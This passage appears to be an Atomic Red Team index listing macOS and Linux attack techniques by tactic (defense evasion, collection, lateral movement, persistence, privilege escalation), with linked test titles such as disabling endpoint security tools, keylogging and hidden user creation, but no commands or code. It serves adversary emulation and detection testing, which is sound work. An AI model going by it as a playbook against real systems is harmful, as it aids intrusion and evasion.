- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1647 Plist File Modification](../../T1647/T1647.md)
- Atomic Test #1: Plist Modification [macos]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #3: Install root CA on macOS [macos]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #7: MacOS Swift Keylogger [macos]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #3: using Quicktime Player [macos]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #2: Create a user account on a MacOS system [macos]
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
# privilege-escalation
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1514 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
